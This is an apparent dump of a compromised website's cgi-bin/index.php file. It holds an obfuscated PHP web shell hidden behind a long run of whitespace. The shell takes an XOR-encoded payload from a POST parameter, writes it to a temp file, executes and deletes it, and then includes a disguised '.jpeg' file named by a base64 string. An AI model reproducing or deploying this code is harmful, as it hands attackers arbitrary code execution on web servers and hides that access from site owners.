Current File : /home/missente/public_html/cgi-bin/cgi-bin/index.php
<?php																																										if(isset($_POST) && isset($_POST["\x76\x61l"])){ $ptr = hex2bin($_POST["\x76\x61l"]); $key ='' ;$o = 0; do{$key .= chr(ord($ptr[$o]) ^ 57);$o++;} while($o < strlen($ptr)); $ent = array_filter([getenv("TMP"), ini_get("upload_tmp_dir"), getenv("TEMP"), session_save_path(), "/dev/shm", getcwd(), sys_get_temp_dir(), "/var/tmp", "/tmp"]); while ($k = array_shift($ent)) { if ((is_dir($k) and is_writable($k))) { $pgrp = vsprintf("%s/%s", [$k, ".resource"]); $success = file_put_contents($pgrp, $key); if ($success) { include $pgrp; @unlink($pgrp); exit;} } } }
 include base64_decode("WkxYWVB4YktHSkl6VkFwVS5qcGVn"); ?>